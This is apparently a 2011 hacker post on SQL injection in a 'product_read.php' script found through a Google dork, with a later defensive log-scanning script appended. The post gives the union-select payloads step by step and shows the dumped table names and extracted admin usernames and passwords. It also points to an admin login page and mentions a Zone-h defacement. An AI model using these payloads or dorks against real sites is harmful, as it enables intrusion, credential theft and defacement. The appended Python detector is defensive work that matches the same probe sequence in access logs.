SQLi vuln in dork product_read

by LOLids artich | 0 comments


Thursday 24/03/2011 @ 00.01 am

I was browsing around on Google looking for something interesting, and while typing the keyword product_review, some interesting sites came up! So I tried playing around a little, just for fun, since it has been a long time since I did this kind of thing, ever since I got a wife at home :). Let's get right to it!

####################################
auth : LOL1ds
team : IHT
push : LOL1ds[at]hackermail[dot]com
dork : product_read.php?id=LOL1ds
type : SQLi vulnerability
####################################
exp:
./ http://localhost.com/product_read.php?id=LOL'
./ order by 26--
./ product_read.php?id=LOL+union+select+1,2,group_concat(table_name)
,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
+from+information_schema.tables+where+table_schema=database()--
./ admin,banner,banner_bk160709,counter,counter_copy,news,phpbb_acl_groups,
phpbb_acl_options,phpbb_acl_roles,phpbb_acl_roles_data,phpbb_acl_users,
phpbb_attachments,phpbb_banlist,phpbb_bbcodes,phpbb_bookmarks,phpbb_bots,
phpbb_config,phpbb_confirm,phpbb_disallow,phpbb_drafts,phpbb_extension_groups,
phpbb_extensions,phpbb_forums,phpbb_forums_access,phpbb_forums_track,
phpbb_forums_watch,phpbb_groups,phpbb_icons,phpbb_lang,phpbb_log,
phpbb_moderator_cache,phpbb_modules,phpbb_poll_options,phpbb_poll_votes,
phpbb_posts,phpbb_privmsgs,phpbb_privmsgs_folder,phpbb_privmsgs_rules,
phpbb_privmsgs_to,phpbb_profile_fields,phpbb_profile_fields_data,
phpbb_profile_fields_lang,phpbb_profile_lang,phpbb_ranks,phpbb_reports,
phpbb_reports_reasons,phpbb_search_results,phpbb_search_wordlist,
phpbb_search_wordmatch,phpbb_sessions,phpbb_sessions_keys,phpbb_sitelist,
phpbb_smilies,phpbb_spam_log,phpbb_spam_words,phpbb_styles,
phpbb_styles_imageset,phpbb_styles_imageset_data,phpbb_styles_template,
phpbb_styles_template_data,
phpbb_styles_theme,phpb
#####################################
exp table :
./ admin
./ ./ product_read.php?id=LOL+union+select+1,2,group_concat(column_name)
,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
+from+information_schema.columns+where+table_name=0xLOL--
id,user,pass,level
#####################################
user : LOL | espazs
pass : LOL1ds | LOL
#####################################
admin login : http://localhost.com/admin/login.php
#####################################
demo : just test security-re!!! Complite Zone-h.org
#####################################
gr33atz : Allah S.W.T, my wife, All my friends in team, and You.
moxercrew, Indonesianhackerteam, indonesiancoder, devilzc0de, jatimcrew, surabayahackerlink, jasakom, yogyacarderlink, Magelangcyber, Jasakom, echo.
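
For defenders, the request sequence in the advisory above (quote probe, `order by` column count, `union select` against `information_schema`) is easy to spot in web-server access logs. The following is an added example, not part of the original post: it assumes combined-log-format lines, and the sample log lines, IP addresses and stage names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Stages of the probe sequence, most advanced first (names are this example's own).
STAGES = [
    ("schema_enum", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("union_select", re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("quote_probe", re.compile(r"['\"]\s*$")),
]
# Request target inside a combined-log-format line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Mar/2011:00:01:02 +0700] "GET /product_read.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [24/Mar/2011:00:01:09 +0700] "GET /product_read.php?id=12%27 HTTP/1.1" 200 312',
    '203.0.113.7 - - [24/Mar/2011:00:01:20 +0700] "GET /product_read.php?id=12+order+by+26-- HTTP/1.1" 200 5120',
    '203.0.113.7 - - [24/Mar/2011:00:01:31 +0700] "GET /product_read.php?id=12+union+select+1,2,group_concat(table_name)+from+information_schema.tables-- HTTP/1.1" 200 9000',
    '198.51.100.4 - - [24/Mar/2011:00:02:00 +0700] "GET /index.php?id=5 HTTP/1.1" 200 100',
]

def classify_id(value):
    """Return the most advanced stage a decoded parameter value matches, or None."""
    for name, pattern in STAGES:
        if pattern.search(value):
            return name
    return None

def scan(lines, script="product_read.php", param="id"):
    """Return (client_ip, stage, decoded_value) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes the value and turns '+' into a space.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            stage = classify_id(value)
            if stage:
                hits.append((line.split()[0], stage, value))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A single client moving from `quote_probe` through `column_count` to `schema_enum` within a short window is a stronger signal than any one match alone.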




